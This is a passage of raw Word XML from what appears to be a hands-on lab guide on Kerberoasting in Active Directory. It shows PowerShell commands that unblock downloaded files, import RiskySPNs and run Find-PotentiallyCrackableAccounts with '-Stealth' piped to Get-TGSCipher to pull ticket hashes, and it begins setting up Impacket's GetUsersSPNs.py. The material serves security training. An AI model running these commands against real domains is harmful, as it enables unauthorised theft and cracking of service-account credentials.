      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EE825A" w14:textId="4A92C6E4"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51F2EA0">
          <v:shape id="_x0000_i1305" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId89" w:name="DefaultOcxName52" w:shapeid="_x0000_i1305"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Next, to attempt to load the module again, enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Import-Module .\RiskySPNs.psm1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0B734F" w14:textId="5EA0AB53"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84C719C">
          <v:shape id="_x0000_i1304" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId90" w:name="DefaultOcxName53" w:shapeid="_x0000_i1304"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>It fails again. This could be because of the added protections. Therefore, we can change the setting in the file properties as shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24539BE1" w14:textId="490A2662"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57AF646F" wp14:editId="054BD3D4">
            <wp:extent cx="2756535" cy="3889375"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="675895528"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56535" cy="3889375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="368FDC15" w14:textId="5836CBB0"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EACCC57">
          <v:shape id="_x0000_i1303" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId92" w:name="DefaultOcxName54" w:shapeid="_x0000_i1303"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We can also use the option in the PowerShell command. Simply enter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> | Unblock-File</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, and this will unblock the entire folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FAE732" w14:textId="1E0453B9"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6281386">
          <v:shape id="_x0000_i1302" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId93" w:name="DefaultOcxName55" w:shapeid="_x0000_i1302"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Now that the module is loaded, enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.\Find-PotentiallyCrackableAccounts.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. When it works, the output of the command appears as shown in the following screenshot. However, in your </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>case, it will fail because Microsoft has added another protection. Regardless, we cover it since you might find a machine that is not patched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8453A2" w14:textId="4E6B64E4"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0A81E781" wp14:editId="53ADD258">
            <wp:extent cx="5400040" cy="2155190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13361376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2155190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12897254" w14:textId="2E83C593"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49B01F3">
          <v:shape id="_x0000_i1301" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId95" w:name="DefaultOcxName56" w:shapeid="_x0000_i1301"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The tools work well, but once again, we must have an Administrator PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF3B963" w14:textId="53669A90"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9A6A90F">
          <v:shape id="_x0000_i1300" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId96" w:name="DefaultOcxName57" w:shapeid="_x0000_i1300"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter the following code to extract the key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1BDFA2" w14:textId="77777777" w:rsidR="00D05942" w:rsidRPr="00D05942" w:rsidRDefault="00D05942" w:rsidP="00D05942">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D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Find-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>PotentiallyCrackableAccounts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Stealth -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GetSPNs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TGSCipher</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2A5F2D6F" w14:textId="79CC0F3E"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49B07FDD">
          <v:shape id="_x0000_i1299" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId97" w:name="DefaultOcxName58" w:shapeid="_x0000_i1299"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The output of this command is shown in the next screenshot on a machine that has not been patched. It is included as a reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205EBE2A" w14:textId="62099492"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13260BD8" wp14:editId="79703E0E">
            <wp:extent cx="5400040" cy="309245"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1268555924"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309245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB205A1" w14:textId="510EC651"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5A106AE">
          <v:shape id="_x0000_i1298" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId99" w:name="DefaultOcxName59" w:shapeid="_x0000_i1298"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>As we have discussed, this can be quite challenging, so the best option is to use Linux. Linux has tools that can be used as well; as long as the credentials for any user are available, then we can extract the SPNs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618EF06A" w14:textId="24D1A4CD" w:rsidR="00D05942" w:rsidRPr="00D05942" w:rsidRDefault="00D05942" w:rsidP="00D05942">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D8A174D">
          <v:shape id="_x0000_i1297" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId100" w:name="DefaultOcxName60" w:shapeid="_x0000_i1297"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Let us prepare to do that now. We will use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText>HYPERLINK "https://labclient.labondemand.com/Instructions/27a69232-3147-4622-a040-37f066689f87?rc=10"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0067B8"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ParrotAD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AA0752" w14:textId="7F612B17"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35ACD9DD">
          <v:shape id="_x0000_i1296" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId101" w:name="DefaultOcxName61" w:shapeid="_x0000_i1296"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Once you are logged into the machine, open a terminal window. We will use the tool </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. An explanation for this tool is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE7B572" w14:textId="5C3E3244"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432EB48C" wp14:editId="3FE2009C">
            <wp:extent cx="5400040" cy="1127125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="505648533"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1127125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1028BC65" w14:textId="321A06B1"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1D140B7">
          <v:shape id="_x0000_i1295" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId103" w:name="DefaultOcxName62" w:shapeid="_x0000_i1295"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Navigate to the folder </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Downloads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/examples</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D02A6A" w14:textId="262EC15C"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03AC8EDE">
          <v:shape id="_x0000_i1294" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId104" w:name="DefaultOcxName63" w:shapeid="_x0000_i1294"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Once there, enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. An example of this is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF7CF12" w14:textId="74F65F76"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0DF17ACC" wp14:editId="40F43DDF">
            <wp:extent cx="5400040" cy="557530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="196309952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557530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CF9F9C" w14:textId="01C875C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040094AB">
          <v:shape id="_x0000_i1293" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId106" w:name="DefaultOcxName64" w:shapeid="_x0000_i1293"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>As the above screenshot shows, we have quite a few different tools. You can explore this further. For our purposes, we are interested in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GetUsersSPNs.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262AF4BF" w14:textId="6EA51097"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25540C36">
          <v:shape id="_x0000_i1292" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId107" w:name="DefaultOcxName65" w:shapeid="_x0000_i1292"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Before we start, we want to make an entry in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> file so we can reference the domain name. Open it in your favorite editor and enter the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IP address</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> mapped to the domain of the server. An example of this is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FC0B64" w14:textId="5B4A27CF"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24652DEA" wp14:editId="3693B316">
